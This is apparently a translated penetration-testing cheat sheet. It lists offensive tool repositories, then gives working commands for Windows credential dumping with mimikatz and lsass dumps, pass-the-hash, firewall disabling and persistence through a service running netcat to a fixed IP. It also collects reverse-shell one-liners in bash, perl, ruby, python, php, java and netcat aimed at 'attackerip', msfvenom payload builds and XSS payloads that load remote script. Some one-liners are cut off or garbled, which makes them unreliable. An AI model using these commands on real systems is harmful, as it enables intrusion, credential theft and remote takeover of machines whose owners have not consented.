Getting Started
Https://wizardforcel.gitbooks.io/web-hacking-101/content/ Web Hacking 101 Chinese Https://wizardforcel.gitbooks.io/asani/content/ Easy to get Android security Chinese version Https://wizardforcel.gitbooks.io/lpad/content/ Android penetration test study manual Chinese version Https://wizardforcel.gitbooks.io/kali-linux-web-pentest-cookbook/content/ Kali Linux Web Penetration Test Cheats Chinese Version Https://github.com/hardenedlinux/linux-exploit-development-tutorial Linux exploit Development Primer Https://www.gitbook.com/book/t0data/burpsuite/details burpsuite actual guide Http://www.kanxue.com/?article-read-1108.htm=&winzoom=1 Penetration Testing Node.js Application Https://github.com/qazbnm456/awesome-web-security Web Security Information and Resources List Https://sec-wiki.com/ sec-wiki Security Wikipedia Fuzz tool collection
https://github.com/ivanfratric/winafl https://github.com/attekett/NodeFuzz https://github.com/google/oss-fuzz http://blog.topsec.com.cn/ad_lab/alphafuzzer/ http://llvm.org/docs/LibFuzzer.html Subdomain name enumeration
https://github.com/lijiejie/subDomainsBrute (Classic Subdomain Blasting Enumeration Script) Https://github.com/ring04h/wydomain (subdomain dictionary exhaustive) Https://github.com/le4f/dnsmaper (subdomain enumeration and map marker) Https://github.com/0xbug/orangescan (online subdomain information collection tool) https://github.com/TheRook/subbrute (Query subdomains based on DNS records) https://github.com/We5ter/GSDF (subdomain query script based on Google SSL transparent certificate) Https://github.com/mandatoryprogrammer/cloudflare_enum (a script for subdomain enumeration using CloudFlare) https://github.com/18F/domain-scan (A domain scanner) https://github.com/guelfoweb/knock (Knock Subdomain Scan) https://github.com/Evi1CLAY/CoolPool/tree/master/Python/DomainSeeker (Collecting target subdomain information in multiple ways) https://github.com/code-scan/BroDomain (Brothers Domain Lookup) Https://github.com/chuhades/dnsbrute (enumeration of subdomains based on dns queries) Web application scanner
http://github.com/Arachni/arachni (web application security scanner framework http://www.arachni-scanner.com) Database scan, injection tool
Https://github.com/sqlmapproject/sqlmap (injection tool king sqlmap) https://github.com/0xbug/SQLiScanner (a passive SQL injection vulnerability scanning tool based on SQLMAP and Charles) https://github.com/stamparm/DSSS (SQL Injection Vulnerability Scanner for 99 Lines of Code) https://github.com/youngyangyang04/NoSQLAttack (A attack tool for mongoDB) https://github.com/Neohapsis/bbqsql (SQL Blind Use Framework) https://github.com/NetSPI/PowerUpSQL (Powershell Scripting Framework to Attack SQL Server) https://github.com/WhitewidowScanner/whitewidow (another database scanner) Https://github.com/stampery/mongoaudit (MongoDB Auditing and Infiltration Tools) Https://github.com/commixproject/commix (Injection point command execution tool) Weak password or information leak scan
https://github.com/lijiejie/htpwdScan (a simple HTTP brute-force, hit-attack script) https://github.com/lijiejie/BBScan (a mini-message leak scanning script) https://github.com/lijiejie/GitHack (.git Folder Leakage Utility) https://github.com/LoRexxar/BScanner (Dictionary-based directory scanning widget) Https://github.com/she11c0der/fenghuangscanner_v3 (various ports and weak password detection, author wilson9x1, original address expired) https://github.com/ysrc/F-Scrack (Script for weak password detection for various services) https://github.com/Mebus/cupp (Generate weak password detection dictionary script according to user habits) https://github.com/RicterZ/genpAss (Chinese weak password generator) Https://github.com/netxfly/crack_ssh (go to the ssh\redis\mongodb weak password cracking tool written by go) https://github.com/n0tr00t/Sreg (All internet passport information registered by returning user by entering email, phone, username) https://github.com/repoog/GitPrey (GitHub Sensitive Information Scan Tool) https://github.com/dxa4481/truffleHog (GitHub sensitive information scanning tool, including detection commit, etc.) https://github.com/LandGrey/pydictor (Violence Dictionary Builder) https://github.com/GDSSecurity/xxe-recursive-download (xxe Recursive Recursive Download Tool) Https://buer.haus/xxegen/ (xxe online generation utility) Internet of Things Device Scan
https://github.com/rapid7/IoTSeeker (Internet of Things Devices Default Password Scan Detection Tool) Https://github.com/shodan-labs/iotdb (using nmap to scan IoT devices) https://github.com/jh00nbr/Routerhunter-2.0 (Router exploit exploit) Https://github.com/reverse-shell/routersploit (Router exploit framework) Https://github.com/scu-igroup/telnet-scanner (telnet service password hit library) https://github.com/RUB-NDS/PRET (Printer Attack Framework) XSS scan
https://github.com/shawarkhanethicalhacker/BruteXSS (Cross-Site Scripting Bruteforcer) https://github.com/1N3/XSSTracer (A small python script to check for Cross-Site Tracing) https://github.com/0x584A/fuzzXssPHP (reflective xss scan for PHP version) Https://github.com/chuhades/xss_scan (Batch scanning xss python script) https://github.com/BlackHole1/autoFindXssAndCsrf (Automated detection of browsers with XSS and CSRF vulnerability) Corporate network self-test
https://github.com/sowish/LNScan (Detailed Internal Network Information Scanner) https://github.com/SkyLined/LocalNetworkScanner (Local network scanner implemented in javascript) Https://github.com/ysrc/xunfeng (Web Asset Recognition Engine, Vulnerability Detection Engine) https://github.com/laramies/theHarvester (Enterprises Include Sensitive Asset Information Monitoring Scripts by Search Engines: Employee Email, Subdomain, Hosts) https://github.com/x0day/Multisearch-v2 (Search Engine Aggregate Search, which can be used to find information on sensitive assets included in search engines by enterprises) Webshell detection and virus analysis tools
https://github.com/We5ter/Scanners-Box/tree/master/webshell/ (Simple php backdoor detection tool and webshell repository) https://github.com/ym2011/ScanBackdoor (Webshell scanning tool) https://github.com/yassineaddi/BackdoorMan (PHP backdoor scanning) https://github.com/he1m4n6a/findWebshell (another webshell detection tool) https://github.com/Tencent/HaboMalHunter (Hubble Analysis System, Linux System Virus Analysis and Security Inspection) https://github.com/PlagueScanner/PlagueScanner (integrated ClamAV, ESET, Bitdefender anti-virus engine implemented in python) Https://github.com/nbs-system/php-malware-finder (a high-efficiency PHP-webshell scanning tool) https://github.com/emposha/PHP-Shell-Detector/ (webshell detection tool with up to 99% test efficiency) Intranet security penetration test tool set
https://github.com/0xwindows/VulScritp (Intranet penetration scripts, including banner scans, port scans, various general exploits, etc.) Https://github.com/lcatro/network_backdoor_scanner (Intranet detection framework based on network traffic) Https://github.com/fdiskyou/hunter (Call the Windows API to enumerate user login information) https://github.com/BlackHole1/WebRtcXSS (Automated XSS Intrusion to Intranet) https://github.com/AlessandroZ/LaZagne (Local Password Viewer Extraction Tool) Https://github.com/huntergregal/mimipenguin (linux password crawler artifact) Port scanning, fingerprinting, and middleware scanning
Https://nmap.org/download.html (king of Nmap port scanners, https://svn.nmap.org/) Https://github.com/ring04h/wyportmap (target port scanning + system service fingerprinting) Https://github.com/ring04h/weakfilescan (Dynamic multithread sensitive information leak detection tool) https://github.com/EnableSecurity/wafw00f (WAF product fingerprinting) Https://github.com/rbsec/sslscan (ssl type identification) Https://github.com/urbanadventurer/whatweb (web fingerprinting) https://github.com/tanjiti/FingerPrint (web application fingerprinting) https://github.com/nanshihui/Scan-T (Web crawler fingerprint recognition) https://github.com/OffensivePython/Nscan (a fast Network scanner inspired by Masscan and Zmap) https://github.com/ywolf/F-NAScan (Network asset information scanning, ICMP survivability detection, port scanning, port fingerprinting service identification) https://github.com/ywolf/F-MiddlewareScan (middleware scanning) https://github.com/maurosoria/dirsearch (Web path scanner) Https://github.com/x0day/bannerscan (C segment Banner and path scan) https://github.com/RASSec/RASscan (Port Service Scan) Https://github.com/3xp10it/bypass_waf (waf breaks automatically) Https://github.com/3xp10it/xcdn (try to find out the real ip behind cdn) https://github.com/Xyntax/BingC (C segment/side station query based on Bing search engine, multi-threaded, support API) https://github.com/Xyntax/DirBrute (Multithreaded WEB Directory Blast Tool) Https://github.com/zer0h/httpscan (a reptile-style web host discovery gadget) Https://github.com/lietdai/doom (distributed distributed ip port vulnerability scanner implemented on thorn) Https://github.com/chichou/grab.js (A quick TCP fingerprinting parsing tool similar to zgrab supports more protocols) https://github.com/Nitr4x/whichCDN (CDN identification, detection) Https://github.com/secfree/bcrpscan (Crawler-based web path scanner) Targeted vulnerability testing tools
https://github.com/brianwrf/hackUtils (java deserialization utility tool set) Https://github.com/frohoff/ysoserial (java deserialization utility) https://github.com/blackye/Jenkins (Jenkins vulnerability detection, user crawl blasting) Https://github.com/code-scan/dzscan (discuz vulnerability scan) https://github.com/chuhades/CMS-Exploit-Framework (CMS attack framework) https://github.com/lijiejie/IIS_shortname_Scanner (IIS Short File Name Vulnerability Scan) https://github.com/riusksk/FlashScanner (flashxss scan) https://github.com/coffeehb/SSTIF (Semi-automated tool for server-side template injection vulnerabilities) Https://github.com/epinna/tplmap (server side template injection vulnerability detection and utilization tool) Https://github.com/cr0hn/dockerscan (docker scan tool) https://github.com/GoSecure/break-fast-serial (Use DNS Resolution to Detect Java Deserialization Vulnerability Tools) Https://github.com/dirtycow/dirtycow.github.io (Dirty Bullet Right Exploit exp) Wireless network penetration, scanning
Https://github.com/savio-code/fern-wifi-cracker/ (wireless security audit tool) https://github.com/m4n3dw0lf/PytheM (Python Network/Penetration Test Tool) https://github.com/P0cL4bs/WiFi-Pumpkin (Wireless Security Penetration Test Suite) Code static scan, code run stack trace
Https://github.com/exakat/php-static-analysis-tools (php static scanning toolset) Https://github.com/wufeifei/cobra (White Box Code Security Auditing System) https://github.com/OneSourceCat/phpvulhunter (static php code auditing) https://github.com/Qihoo360/phptrace (tool to track and analyze the performance of PHP) https://github.com/ajinabraham/NodeJsScan (NodeJS Application Code Audit) https://github.com/pwnsdx/BadCode (PHP Code Auditing) Https://github.com/thesp0nge/dawnscanner (ruby source audit) Https://github.com/presidentbeef/brakeman (Security vulnerability for Ruby on Rails applications) https://github.com/ajinabraham/Mobile-Security-Framework-MobSF/ (app black box audit) https://github.com/alibaba/iOSSecAudit (iOS Security Audit) Modular scan, integrated scanner
https://github.com/az0ne/AZScanner (Automatic vulnerability scanner, subdomain blasting, port scanning, directory blasting, common framework vulnerability detection) Https://github.com/blackye/lalascan (Distributed web vulnerability scanning framework, collection owasp top10 vulnerability scanning and boundary asset discovery capabilities) https://github.com/blackye/BkScanner (BkScanner distributed, plug-in web vulnerability scanner) https://github.com/ysrc/GourdScanV2 (Passive vulnerability scanning) Https://github.com/alpha1e0/pentestdb (WEB penetration test database) Https://github.com/netxfly/passive_scan (web proxy based web vulnerability scanner) https://github.com/1N3/Sn1per (Automated scanners, including middleware scanning and device fingerprinting) https://github.com/RASSec/pentestEr_Fully-automatic-scanner (Oriented fully automated penetration testing tool) Https://github.com/3xp10it/3xp10it (Automated penetration testing framework) https://github.com/Lcys/lcyscan (Scan results are not verified) https://github.com/Xyntax/POC-T (penetration test plug-in concurrency framework) https://github.com/v3n0m-Scanner/V3n0M-Scanner (Scanner in Python3.5 for SQLi/XSS/LFI/RFI and other Vulns) https://github.com/Skycrab/leakScan (web-side online vulnerability scanning) https://github.com/zhangzhenfeng/AnyScan (under development...) Android series tools:
http://sec-redclub.com/index.php/archives/439/ DDOS protection:
https://github.com/ywjt/Dshield Database firewall:
https://nim4.github.io/DBShield/ Waf open source and rules:
https://github.com/xsec-lab/x-waf https://github.com/loveshell/ngx_lua_waf https://github.com/SpiderLabs/owasp-modsecurity-crs/tree/master/base_rules Penetration test tool practical skills collection
The best NMAP scanning strategy
$ nmap -sn -T4 -OG Discovery.gnmap 192.168.56.0/24 $ grep "Status: Up" Discovery.gnmap | cut -f 2 -d ' ' > LiveHosts.txt
$ nmap -sS -T4 -Pn -oG TopTCP -iL LiveHosts.txt $ nmap -sU -T4 -Pn -oN TopUDP -iL LiveHosts.txt $ nmap -sS -T4 -Pn --top-ports 3674 -oG 3674 -iL LiveHosts.txt
$ nmap -sS -T4 -Pn -p 0-65535 -oN FullTCP -iL LiveHosts.txt $ nmap -sU -T4 -Pn -p 0-65535 -oN FullUDP -iL LiveHosts.txt
$ grep "open" FullTCP|cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' |xargs | sed 's/ /,/g'|awk '{print "T:"$0}' $ grep "open" FullUDP|cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' |xargs | sed 's/ /,/g'|awk '{print "U:"$0}'
$ nmap -sV -T4 -Pn -oG ServiceDetect -iL LiveHosts.txt
$ nmap -O -T4 -Pn -oG OSDetect -iL LiveHosts.txt
$ nmap -O -sV -T4 -Pn -p U:53,111,137,T:21-25,80,139,8080 -oG OS_Service_Detect -iL LiveHosts.txt Nmap - Dodge the firewall
$ nmap -f
$ nmap - 24
$ nmap -D RND:10 [target]
$ nmap -D decoy1,decoy2,decoy3 etc.
$ nmap -sI [Zombie IP] [Target IP]
$ nmap --source-port 80 IP
$ nmap --data-length 25 IP
$ nmap --spoof-mac Dell/Apple/3Com IP Nmap for Web Vulnerability Scanning
cd /usr/share/nmap/scripts/ wget http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz && tar xzf nmap_nse_vulscan-2.0.tar.gz nmap -sS -sV --script=vulscan/vulscan.nse target nmap -sS -sV --script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv target nmap -sS -sV --script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv -p80 target nmap -PN -sS -sV --script=vulscan –script-args vulscancorrelation=1 -p80 target nmap -sV --script=vuln target nmap -PN -sS -sV --script=all –script-args vulscancorrelation=1 target Use DIRB Blasting Directory
Note: DIRB is a tool dedicated to blasting catalogs. It has been installed by default in Kali. Similar tools include Patator, dirsearch, DirBuster, and domestic Imperial swords.
dirb http://IP:PORT /usr/share/dirb/wordlists/common.txt Patator - All-Round Brute Force Test Tool
git clone https://github.com/lanjelot/patator.git /usr/share/patator
$ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst $ patator smtp_login host=192.168.17.129 user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst $ patator smtp_login host=192.168.17.129 helo='ehlo 192.168.17.128' user=FILE1 password=FILE0 0=/usr/share/john/password.lst 1=/usr/share/john/usernames.lst $ patator smtp_login host=192.168.17.129 user=Ololena password=FILE0 0=/usr/share/john/password.lst -x ignore:fgrep='incorrect password or account name' Using Fierce Blast DNS
Note: Fierce checks if the DNS server allows zone transfers. If it is allowed, a zone transfer will be performed and the user will be notified. If not, the host name can be enumerated by querying the DNS server. Similar tools: subDomainsBrute, SubBrute, and so on
$ ./fierce.pl -dns example.com $ ./fierce.pl –dns example.com –wordlist myWordList.txt Use Nikto to scan web services
nikto -C all -h http://IP Scan WordPress
git clone https://github.com/wpscanteam/wpscan.git && cd wpscan ./wpscan –url http://IP/ –enumerate p HTTP fingerprinting
wget http://www.net-square.com/_assets/httprint_linux_301.zip && unzip httprint_linux_301.zip cd httprint_301/linux/ ./httprint -h http://IP -s signatures.txt Scan using Skipfish
Note: Skipfish is a Web application security reconnaissance tool. Skipfish uses recursive crawlers and dictionary-based probes to generate an interactive site map. The resulting map will be output after passing the security check.
skipfish -m 5 -LY -S /usr/share/skipfish/dictionaries/complete.wl -o ./skipfish2 -u http://IP Use NC scan
nc -v -w 1 target -z 1-1000 for i in {101..102}; do nc -vv -n -w 1 192.168.56.$i 21-25 -z; done Unicornscan
Note: Unicornscan is a tool for information collection and security auditing.
us -H -msf -Iv 192.168.56.101 -p 1-65535 us -H -mU -Iv 192.168.56.101 -p 1-65535
-H Resolve host name during report generation phase -m scan type (sf - tcp, U - udp) -Iv - Details Using Xprobe2 to Identify Operating System Fingerprints
xprobe2 -v -p tcp:80:open IP Enumeration of Samba
nmblookup -A target smbclient //MOUNT/share -I target -N rpcclient -U "" target enum4linux target Enumerate SNMP
snmpget -v 1 -c public IP snmpwalk -v 1 -c public IP snmpbulkwalk -v2c -c public -Cn0 -Cr10 IP Practical Windows cmd command
net localgroup Users net localgroup Administrators search dir/s *.doc system("start cmd.exe /k $cmd") sc create microsoft_update binpath="cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe" start= auto error= ignore /c C:\nc.exe -e c:\windows\system32\cmd.exe -vv 23.92.17.103 7779 mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords" Procdump.exe -accepteula -ma lsass.exe lsass.dmp mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords" C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp 32-bit system C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp 64-bit System PuTTY connection tunnel
Forward remote port to target address plink.exe -P 22 -l root -pw "1234" -R 445:127.0.0.1:445 IP Meterpreter Port Forwarding
meterpreter > portfwd add –l 3389 –p 3389 –r 172.16.194.141 kali > rdesktop 127.0.0.1:3389 Turn on RDP service
reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0 netsh firewall set service remoteadmin enable netsh firewall set service remotedesktop enable Turn off Windows Firewall
netsh firewall set opmode disable Meterpreter VNC \ RDP
run getgui -u admin -p 1234 run vnc -p 5043 Use Mimikatz
Get Windows plaintext username and password
git clone https://github.com/gentilkiwi/mimikatz.git privilege::debug sekurlsa::logonPasswords full Get a hash
git clone https://github.com/byt3bl33d3r/pth-toolkit pth-winexe -U hash //IP cmd
or
apt-get install freerdp-x11 xfreerdp /u:offsec /d:win2012 /pth:HASH /v:IP
At or
meterpreter > run post/windows/gather/hashdump Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c::: msf > use exploit/windows/smb/psexec msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c msf exploit(psexec) > exploit meterpreter > shell Use Hashcat to crack the password
hashcat -m 400 -a 0 hash /root/rockyou.txt Use NC to fetch Banner information
nc 192.168.0.10 80 GET / HTTP/1.1 Host: 192.168.0.10 User-Agent: Mozilla/4.0 Referrer: www.example.com Bounce shell on Windows using NC
c:>nc -Lp 31337 -vv -e cmd.exe nc 192.168.0.10 31337 c:>nc example.com 80 -e cmd.exe nc -lp 80
nc -lp 31337 -e /bin/bash nc 192.168.0.10 31337 nc -vv -r(random) -w(wait) 1 192.168.0.10 -z(i/o error) 1-1000 Find the SUID\SGID root file
find / -user root -perm -4000 -print
find / -group root -perm -2000 -print
find / -perm -4000 -o -perm -2000 -print
find / -nouser -print
find / -nogroup -print
find / -type l -ls Python shell
python -c 'import pty;pty.spawn("/bin/bash")' Python\Ruby\PHP HTTP Server
python2 -m SimpleHTTPServer python3 -m http.server ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 8888, :D ocumentRoot => Dir.pwd).start" php -S 0.0.0.0:8888 Get the process's PID
fuser -nv tcp 80 fuser -k -n tcp 80 Rupture RDP using Hydra
hydra -l admin -P /root/Desktop/passwords -S X.X.X.X rdp Mount Remote Windows Shared Folders
smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw Exploit under Kali
gcc -m32 -o output32 hello.c (32 位) gcc -m64 -o output hello.c (64 位) Kali Compiles Windows Exploit
wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download wine mingw-get-setup.exe select mingw32-base cd /root/.wine/drive_c/windows wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip cd /root/.wine/drive_c/MinGW/bin wine gcc -o ability.exe /tmp/exploit.c -lwsock32 wine ability.exe NASM command
Note: The NASM name, The Netwide Assembler, is an assembly language compiler based on 80x86 and x86-64 platforms. It was originally designed to implement cross-platform and modular features of the compiler.
nasm -f bin -o payload.bin payload.asm nasm -f elf payload.asm; ld -o payload payload.o; objdump -d payload SSH penetration
ssh -D 127.0.0.1:1080 -p 22 user@IP Add socks4 127.0.0.1 1080 in /etc/proxychains.conf proxychains commands target SSH penetration from one network to another
ssh -D 127.0.0.1:1080 -p 22 user1@IP1 Add socks4 127.0.0.1 1080 in /etc/proxychains.conf proxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2 Add socks4 127.0.0.1 1081 in /etc/proxychains.conf proxychains commands target Penetrating with metasploit
route add X.X.X.X 255.255.255.0 1 use auxiliary/server/socks4a run proxychains msfcli windows/* PAYLOAD=windows/meterpreter/reverse_tcp LHOST=IP LPORT=443 RHOST=IP E
or
meterpreter> ipconfig IP Address : 10.1.13.3 meterpreter> run autoroute -s 10.1.13.0/24 meterpreter> run autoroute -p 10.1.13.0 255.255.255.0 Session 1 meterpreter> Ctrl + Z msf auxiliary(tcp) > use exploit/windows/smb/psexec msf exploit(psexec) > set RHOST 10.1.13.2 msf exploit(psexec) > exploit meterpreter> ipconfig IP Address : 10.1.13.2 Query Exploit-DB based on CSV file
git clone https://github.com/offensive-security/exploit-database.git cd exploit-database ./searchsploit –u ./searchsploit apache 2.2 ./searchsploit "Linux Kernel"
cat files.csv | grep -i linux | grep -i kernel | grep -i local | grep -v dos | uniq | grep 2.6 | egrep "<|<=" | sort -k3 MSF Payloads
msfvenom -p windows/meterpreter/reverse_tcp LHOST= X > system.exe msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT=443 R > exploit.php msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -e -a x86 --platform win -f asp -o file.asp msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -e x86/shikata_ga_nai -b "\x00" -a x86 --platform win -f c MSF Generates Meterpreter Shell Bounced Under Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT=443 -e -f elf -a x86 --platform linux -o shell MSF Generate Bounce Shell (C Shellcode)
msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=443 -b "\x00\x0a\x0d" -a x86 --platform win -f c MSF Generates Bounce Python Shell
msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=443 -o shell.py MSF Build Bounce ASP Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp -a x86 --platform win -o shell.asp MSF generates a rebound Bash Shell
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -o shell.sh MSF builds a rebound PHP shell
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -o shell.php add <?php at the beginning perl -i~ -0777pe's/^/<?php \n/' shell.php MSF Build Bounce Win Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe -a x86 --platform win -o shell.exe Linux common security commands
find / -uid 0 -perm -4000
find / -perm -o=w
find / -name " " -print find / -name ".." -print find / -name ". " -print find / -name " " -print
find / -nouser
lsof +L1
lsof -i
arp -a
getent passwd
getent group
for user in $(getent passwd|cut -f1 -d:); do echo "### Crontabs for $user ####"; crontab -u $user -l; done
cat /dev/urandom| tr -dc ‘a-zA-Z0-9-!@#$%^&*()+{}|:<>?=’|fold -w 12| head -n 4
find . | xargs -I file lsattr -a file 2>/dev/null | grep ‘^….i’
chattr -i file Windows buffer overflow exploit command
msfvenom -p windows/shell_bind_tcp -a x86 --platform win -b "\x00" -f c msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 -a x86 --platform win -e x86/shikata_ga_nai -b "\x00" -f c
COMMONLY USED BAD CHARACTERS: \x00\x0a\x0d\x20 For http request \x00\x0a\x0d\x20\x1a\x2c\x2e\3a\x5c Ending with (0\n\r_)
pattern create pattern offset (EIP Address) pattern offset (ESP Address) add garbage upto EIP value and add (JMP ESP address) in EIP . (ESP = shellcode )
!pvefindaddr pattern_create 5000 !pvefindaddr suggest !pvefindaddr modules !pvefindaddr nosafeseh
!mona config -set workingfolder C:\Mona%p !mona config -get workingfolder !mona mod !mona bytearray -b "\x00\x0a" !mona pc 5000 !mona po EIP !mona suggest SEH - Structured Exception Handling
Note: SEH ("Structured Exception Handling"), structured exception handling, is a powerful handler error or exception weapon provided by the Windows operating system to the programmer.
!mona suggest !mona nosafeseh nseh = "\ xeb6e5" x90 "(next seh chain) iseh= !pvefindaddr p1 -n -o -i (POP POP RETRUN or POPr32,POPr32,RETN) ROP (DEP)
Note: ROP ("Return-Oriented Programming") is a computer security exploit technology that allows an attacker to execute code in the context of security defenses, such as non-executable memory and code signing.
DEP ("Data Execution Prevention") is a set of software and hardware technologies that strictly distinguish between code and data in memory to prevent data as code execution.
!mona modules !mona ropfunc -m *.dll -cpb "\x00\x09\x0a" !mona rop -m *.dll -cpb "\x00\x09\x0a" (auto suggest) ASLR - Randomization of Address Space Patterns
!mona noaslr Egg Hunt Technology
Egg hunting This technique can be classified as "hierarchical shellcode". It mainly allows you to find your actual (bigger) shellcode (our 'egg') with a small piece of specially crafted shellcode. The principle is through memory. Search our final shellcode. In other words, a short code is executed first and then the real shellcode is looked for and executed. – See the Self-Viewing Snow Forum for more details on the links I added in the code comments.
!mona jmp -r esp !mona egg -t lxxl \xeb\xc4 (jump backward -60) buff=lxxllxxl+shell !mona egg -t 'w00t' GDB Debugger Common Commands
break *_start
next step n s
continue c
checking 'REGISTERS' and 'MEMORY'
print /d –> Decimal
print /t –> Binary
print /x –> Hex
O/P :
(gdb) print /d $eax
$17 = 13
(gdb) print /t $eax
$18 = 1101
(gdb) print /x
command: x / nyz (exam) n –> Number of fields to display ==> y –> Format for output ==> c (character) , d (decimal) , x (Hexadecimal) z –> Size of field to be displayed ==> b (byte) , h (halfword), w (word 32 Bit) BASH Bounce Shell
bash -i >& /dev/tcp/X.X.X.X/443 0>&1
exec /bin/bash 0&0 2>&0 exec /bin/bash 0&0 2>&0
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/attackerip/4444 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done exec 5<>/dev/tcp/attackerip/4444
cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done
/bin/bash -i > /dev/tcp/attackerip/8080 0<&1 2>&1 /bin/bash -i > /dev/tcp/X.X.X.X/443 0<&1 2>&1 PERL rebound shell
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:443");STDIN->fdopen(
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen(
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("attackerip","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
ruby -rsocket -e 'c=TCPSocket.new("attackerip","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' ruby -rsocket -e 'f=TCPSocket.open("attackerip","443").to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' PYTHON Bounce Shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attackerip",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' PHP rebound shell
php -r '$sock=fsockopen("attackerip",443);exec("/bin/sh -i <&3 >&3 2>&3");' JAVA rebound shell
r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/attackerip/443;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[]) p.waitFor() NETCAT rebound shell
nc -e /bin/sh attackerip 4444 nc -e /bin/sh 192.168.37.10 443
/bin/sh | nc attackerip 443 rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4443 0/tmp/
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip >/tmp/f TELNET Bounce Shell
mknod backpipe p && telnet attackerip 443 0<backpipe | /bin/bash 1>backpipe XTERM Bounce Shell
apt-get install xnest Xnest :1
xterm -display 127.0.0.1:1
xhost +targetip
xterm -display attackerip:1 /usr/openwin/bin/xterm -display attackerip:1 or $ DISPLAY=attackerip:0 xterm XSS memo
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet ("< iframes > src=http://IP:PORT </ iframes >")
<script>document.location=http://IP:PORT</script>';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//–></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
";!–"=&{()}
<SCRIPT>alert("XSS")</SCRIPT>"">perl -e 'print "<IMG SRC=javascript:alert("XSS")>";' > out
(">< iframes http://google.com < iframes >)
"><script >alert(document.cookie)</script> %253cscript%253ealert(document.cookie)%253c/script%253e ">alert(document.cookie)</script> %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)'%3E SSH Over SCTP (using Socat)Suppose you are preparing to have the SCTP socket listen on port 80/SCTP and the sshd port on 22/TCP
$ socat SCTP-LISTEN:80,fork TCP:localhost:22
Replace SERVER_IP with the address of the remote server, and replace 80 with the port number on which SCTP listens.
$ socat TCP-LISTEN:1337,fork SCTP:SERVER_IP:80
$ ssh -lusername localhost -D 8080 -p 1337 Using Onion Network
$ apt-get install tor torsocks
